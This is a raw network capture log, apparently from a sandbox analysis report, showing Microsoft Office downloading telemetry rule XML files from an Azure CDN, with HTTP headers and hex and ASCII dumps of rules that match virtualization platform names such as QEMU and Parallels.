                                              2024-10-25 13:46:03 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              79192.168.2.44982413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:02 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:02 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:02 GMT
                                              Content-Type: text/xml
                                              Content-Length: 472
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                              ETag: "0x8DC582BB650C2EC"
                                              x-ms-request-id: 100b0a78-f01e-0003-754e-224453000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134602Z-16849878b78hz7zj8u0h2zng14000000098000000000nz03
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:02 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              80192.168.2.44982613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:03 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:03 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:03 GMT
                                              Content-Type: text/xml
                                              Content-Length: 485
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                              ETag: "0x8DC582BB9769355"
                                              x-ms-request-id: e574f622-301e-0052-4beb-2565d6000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134603Z-16849878b78j7llf5vkyvvcehs00000001ng00000000f9gz
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:03 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              81192.168.2.44982713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:03 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:03 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:03 GMT
                                              Content-Type: text/xml
                                              Content-Length: 411
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                              ETag: "0x8DC582B989AF051"
                                              x-ms-request-id: 53fe968a-201e-0096-055e-26ace6000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134603Z-16849878b78jfqwd1dsrhqg3aw00000009cg00000000asx1
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:03 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              82192.168.2.44982813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:03 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:03 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:03 GMT
                                              Content-Type: text/xml
                                              Content-Length: 470
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                              ETag: "0x8DC582BBB181F65"
                                              x-ms-request-id: c1ca1df0-401e-0029-1e3a-269b43000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134603Z-17c5cb586f67hhlz1ecw6yxtp0000000032g0000000006ae
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:03 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              83192.168.2.44982913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:03 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:03 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:03 GMT
                                              Content-Type: text/xml
                                              Content-Length: 427
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                              ETag: "0x8DC582BB556A907"
                                              x-ms-request-id: ee7a308c-c01e-00a1-620b-227e4a000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134603Z-16849878b78smng4k6nq15r6s4000000021g00000000kwpr
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:03 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              84192.168.2.44983013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:03 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:04 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:03 GMT
                                              Content-Type: text/xml
                                              Content-Length: 502
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                              ETag: "0x8DC582BB6A0D312"
                                              x-ms-request-id: 16b9c19d-f01e-0052-0d9e-269224000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134603Z-16849878b78j7llf5vkyvvcehs00000001q000000000ce21
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:04 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              85192.168.2.44983113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:04 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:05 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:05 GMT
                                              Content-Type: text/xml
                                              Content-Length: 407
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                              ETag: "0x8DC582B9D30478D"
                                              x-ms-request-id: 7842422a-e01e-003c-05ee-25c70b000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134605Z-16849878b785f8wh85a0w3ennn000000095000000000hwzu
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              86192.168.2.44983213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:04 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:04 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:04 GMT
                                              Content-Type: text/xml
                                              Content-Length: 474
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                              ETag: "0x8DC582BB3F48DAE"
                                              x-ms-request-id: ffa56774-c01e-007a-6c38-26b877000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134604Z-16849878b78jfqwd1dsrhqg3aw00000009b000000000eh0e
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:04 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              87192.168.2.44983413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:04 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:04 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:04 GMT
                                              Content-Type: text/xml
                                              Content-Length: 469
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                              ETag: "0x8DC582BB3CAEBB8"
                                              x-ms-request-id: ac69ef67-e01e-001f-7714-221633000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134604Z-16849878b786vsxz21496wc2qn000000098g00000000nf23
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:04 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              88192.168.2.44983313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:04 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:04 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:04 GMT
                                              Content-Type: text/xml
                                              Content-Length: 408
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                              ETag: "0x8DC582BB9B6040B"
                                              x-ms-request-id: cea37fdd-f01e-003f-5ff2-24d19d000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134604Z-r197bdfb6b4gx6v9pg74w9f47s00000002a000000000d751
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:04 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              89192.168.2.44983513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:04 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:04 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:04 GMT
                                              Content-Type: text/xml
                                              Content-Length: 416
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                              ETag: "0x8DC582BB5284CCE"
                                              x-ms-request-id: d9732123-901e-007b-1098-25ac50000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134604Z-16849878b78k46f8kzwxznephs000000091g00000000pfqn
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
